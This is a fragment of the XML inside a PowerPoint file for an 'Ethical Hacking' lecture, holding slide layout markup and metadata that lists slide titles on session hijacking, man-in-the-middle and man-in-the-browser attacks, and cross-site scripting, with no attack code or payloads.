          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132833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82E5C8-04A7-4153-9004-50F70E521B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="656467" y="1027343"/>
            <a:ext cx="10568123" cy="5624513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C881DA1C-D24E-476A-95D0-C613A806C5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="3604592"/>
            <a:ext cx="946205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8D122B4-02EA-4FB5-9DC9-94419E74BCF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="3889514"/>
            <a:ext cx="946205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12F9CE-814F-4D6F-AC15-4032C9F2EEC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="4214192"/>
            <a:ext cx="946205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F6EDAD6-AE2D-4EE2-9025-D36586621E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="4485862"/>
            <a:ext cx="946205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1C3F113-54FF-4D88-BE6C-5D1DE8FF42C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="4784036"/>
            <a:ext cx="946205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5A0E7A-03BF-4EC1-A237-45732FDE1F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="5088836"/>
            <a:ext cx="946205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01E0F68-1FBA-466B-9EA5-353C033AAC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="5380384"/>
            <a:ext cx="946205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7FD2-B039-4053-883D-068041F1DF43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="5698436"/>
            <a:ext cx="946205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6630B1-B70B-4648-8404-8C0E391FA1EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874644" y="6016488"/>
            <a:ext cx="308775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613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DE60-69AB-4C8C-9DE1-BB39D069DFD8}"/>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1966F144-4B26-4FAC-BB66-45FCC7C5133C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="9180443" cy="5988820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2972224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3644</TotalTime>
  <Words>2934</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>128</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Baskerville Old Face</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Inter</vt:lpstr>
      <vt:lpstr>roboto</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Ethical Hacking </vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Session Hijacking types in OSI Level</vt:lpstr>
      <vt:lpstr>Session Hijacking types in OSI Level</vt:lpstr>
      <vt:lpstr>Session Hijacking types in OSI Level</vt:lpstr>
      <vt:lpstr>Application Level Hijacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Various ways to do MITM attack</vt:lpstr>
      <vt:lpstr>Various ways to do MITM attack</vt:lpstr>
      <vt:lpstr>Various ways to do MITM attack</vt:lpstr>
      <vt:lpstr>Various ways to do MITM attack</vt:lpstr>
      <vt:lpstr>Various ways to do MITM attack</vt:lpstr>
      <vt:lpstr>Man in the Browser Attack</vt:lpstr>
      <vt:lpstr>How is Man in the Browser Attack implemented ?</vt:lpstr>
      <vt:lpstr>How is Man in the Browser Attack implemented ?</vt:lpstr>
      <vt:lpstr>How is Man in the Browser Attack implemented ?</vt:lpstr>
      <vt:lpstr>How is Man in the Browser Attack implemented ?</vt:lpstr>
      <vt:lpstr>How is Man in the Browser Attack implemented ?</vt:lpstr>
      <vt:lpstr>Man in the Browser Attack Prevention</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Types of Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Persistent Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Persistent Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Persistent Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Reflected Cross Site Scripting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dc:title>
  <dc:creator>MODHUPA GHOSH</dc:creator>
  <cp:lastModifiedBy>Dr Ghosh</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-09T10:14:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-04T06:32:23Z</dcterms:modified>
</cp:coreProperties>
</file>